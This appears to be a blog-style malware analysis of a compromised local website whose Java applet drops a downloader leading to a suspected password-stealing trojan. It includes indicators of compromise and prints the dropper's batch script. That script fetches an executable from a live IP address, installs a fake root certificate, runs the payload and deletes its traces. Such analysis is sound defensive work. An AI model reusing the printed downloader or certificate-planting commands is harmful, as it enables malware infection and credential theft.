Yesterday, I just found one of local website has been compromised and embedded with malicious code. Once user visiting the website, by allowing the Java applet the malware will be downloaded and installed.
The picture above show you that you will be prompted to use Java plug-in to use some 'features' on this website. Lets take a look on the webpage source code. The red highlighted on the picture below is a Windows Batch command that will drop a VB Script file allowing it to download another malware (Windows executable) from Israel website. The website is also possibly has been compromised.
As we can see, the main page of the website has been embedded with extra code. At the top of it is calling the Java applet (Dantas.jar). This Java applet help to run the Windows Batch command. Below is the Java applet code.
If the Windows Batch Command successfully executed, it will save all the VBScript code into Windows temporary directory as a eden.vbs. Then, run the eden.vbs file to perform download and run the malware executable file.
At the bottom of the website also has been embedded with some scam pharma viagra hyperlink.
Now we need to take a look closer on the PE file downloaded from the following link:
hxxp://www.kanibar.co.il/tmp/DSC12012PDF.exe (a1d2a281980fdd75546557a9ba6de0a6)
The PE file is actually a SFX file. It is containing several file including certificate from the malware author.
FileName |
MD5 |
Desc. |
certadm.dll |
AED39116FE12C5550975043DA1D1B244 |
Microsoft Certificate Services Admin |
certnew.cer |
2B742FEB1883EE5CB418B1CBAB145A7D |
Fake Security Certificate |
certutil.exe |
711DB2EF10B6C2AB2080698AEC6C6D08 |
Cert Util.exe |
givetome.exe |
6D2C398E03397C9D089EDC0F00AB3FCB |
http://noeld.com/programs.asp |
jeovahjireh.exe |
0B2BF362548B244477D9FFB613AF54D4 |
Malware |
The only file are suspicious is 'jeovahjireh.exe'. So we need to take a look closer on this. The file is compressed with UPX 3.07. The PE file is actually some kind of Bat2Exe file binder. Inside the PE file contain Windows Batch Command.
@shift
@break off
echo 274087083240932840982409820482048282830482429384234932408270983238 > %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
set inf=0
set exe="%temp%\msavc.exe"
if exist %temp%\%USERNAME%.dll goto mapa
> %temp%\%USERNAME%.dll echo y
:mapa
%temp%\givetome.exe http://216.17.106.2/~comprapr/KLJAWEIUIJN92838921JAS.JIP "%exe%"
del "%temp%\leiame.txt"
ECHO -------------------------------------------------------------------------------
%tmp%\certutil.exe -addstore root %tmp%\certnew.cer
certutil -addstore root %tmp%\certnew.cer
cmd.exe /c "%exe%"
del /F %tmp%\certnew.cer
del /F %tmp%\certadm.dll
del /F %tmp%\certutil.exe
del /F %tmp%\givetome.exe
echo fhsdkjhfkjdsfkjdsfhdskhfjkhjkhdsjkhfkjsdhfkjsdhfkjdsfds > %temp%\xhuahushbnnmf.dat.dat
echo j943793874324693284632764932843 jfdsjfhkhjdshfjkdhsf>> %temp%\xhuahushbnnmf.dat.dat
. . .
echo jfdeidhpjrher093u40ruhdfuhisufsd90fu43u90urifhdsjfsiofkjsofsdjfsdfdjhfsd >> %temp%\xhuahushbnnmf.dat.dat
echo j943793874324693284632764932843 jfdsjfhkhjdshfjkdhsf>> %temp%\xhuahushbnnmf.dat.dat
echo adgfsvgf354bvt2435tvb234rtg234vtrvc5234tvc254 >> %temp%\xhuahushbnnmf.dat.dat
The code is a bit lengthy and some kind of semi obfuscated. Most of the code are useless. I just cut off some of the junk code.
What the Windows Batch Command do is actually download another PE file from the following URL:
hxxp://216.17.106.2/~comprapr/KLJAWEIUIJN92838921JAS.JIP
The *.jip file will be named as 'msavc.exe' and saved in temp directory. After that it will add the 'certnew.cer' certificate onto the infected machine as a root.
Then, it execute the 'msavc.exe' using cmd.exe. All bundled file will be delete then (certnew.cer, certadm.dll, certutil.exe, givetome.exe).
Now we need to take a look on the new downloaded PE file (B99A6FF84E4404488D789F5D56593735) named as 'msavc.exe'. This file has been packed with UPX 3.08 and written with Borland Delphi.
Based on VirusTotal result the PE file is possibly a trojan stealer, password stealer or trojan banker. Which is stealing user information on victim PCs.
As we can see on the network traffic it will try to access to the following URL followed with parameter content:
hxxp://www.snv1r1.net/2k12v3r1/71164BED09340ABE6D4C69BD.php?op=7A0B4EED571641ED7E277EBE704E09DA3C5D3E
The domain name is still active but the content of the given URL is not available anymore.
Several mutex also created by this malware. The malware also crawling into several sensitive directory.